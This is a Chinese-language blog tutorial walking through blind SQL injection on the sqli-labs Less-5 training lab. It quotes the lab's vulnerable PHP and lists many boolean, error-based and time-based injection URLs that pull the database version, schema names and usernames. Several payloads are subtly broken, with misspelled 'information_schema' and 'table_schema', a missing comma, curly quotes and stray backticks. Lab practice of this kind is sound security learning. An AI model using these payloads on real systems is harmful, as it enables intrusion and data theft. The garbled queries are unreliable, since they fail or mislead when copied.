三種方式簡單實踐一下sql盲注

Less-5

簡單的源碼分析一下

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; //單引號閉合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

//如果語句正確返回界面正常,否則返回錯誤.沒有返回數據的地方

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

利用函數邏輯來判斷

注:以下都是利用二分法進行判斷

判斷數據庫版本號第一位是否爲5(已知版本號爲5)

http://127.0.0.1/Less-5/index.php?id=1'and left(version(),1)=5--+//如果是則返回頁面正確,否則頁面錯誤

判斷數據庫長度

http://127.0.0.1/Less-5/index.php?id=1'and length(database())=8--+

判斷數據庫第一個字母是否大於a

http://127.0.0.1/Less-5/index.php?id=1' and left(database(),1)>'a'--+

判斷數據庫前二個字母

http://127.0.0.1/Less-5/index.php?id=1'and left(database(),2)>'sa'--+

利用substr()和ascii()進行注入

ascii(substr((select table_name from infromation_schema.tables where tables_schema=database() limit 0,1),1,1))=101

獲取第二位字符直接substr(string,2,1)就好了

獲取第二個表,直接limit 0,1 --> limit 1,1就好了

利用regexp來後去users表中的列

http://127.0.0.1/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)-- +

選擇users表中的列名是否有us**的列

http://127.0.0.1/Less-5/index.php?id=1' and 1=(select 1 from infromation_schema.columns where table_name='users' and column_name regexp'^username' limit 0,1)-- +

利用ord()和mid()函數

http://127.0.0.1/Less-5/index.php?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1)1,1))=68

報錯注入

``http://127.0.0.1/Less-5/?id=1’union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+`

double 數值類型超出範圍

``http://127.0.0.1/Less-5/?id=1’union select (exp(~(select * from (select user())a))),2,3–+`

bigint 溢出報錯

``http://127.0.0.1/Less-5/?id=1’union select (!(select * from (select user())x) - ~0),2,3–+`

xpath函數報錯

``http://127.0.0.1/Less-5/?id=1’and extractvalue(1,concat(0x7e,(select @@version),0x7e))–+`

``http://127.0.0.1/Less-5/?id=1’and updatexml(1,concat(0x7e,(select @@version),0x7e),1)–+`

利用數據的重複性

``http://127.0.0.1/Less-5/?id=1’union select 1,2,3 from (select name const(version(),1),name const(version(),1))x–+`

延時注入

``http://127.0.0.1/Less-5/?id=1’and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+`

錯誤的時候會有5秒的延遲

benchmark()延時

``http://127.0.0.1/Less-5/?id=1’union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode(‘msg’,‘by 5 seconds’)),null)),2,3 from (select database()as current)as tb1–+`

當結果正確的時候,運行encode(‘msg’,‘by 5 seconds’)操作5000000次會佔用一段時間

個人自建博客:
http://pigdaqiang.top
簡書:
https://www.jianshu.com/p/3cefb0134f89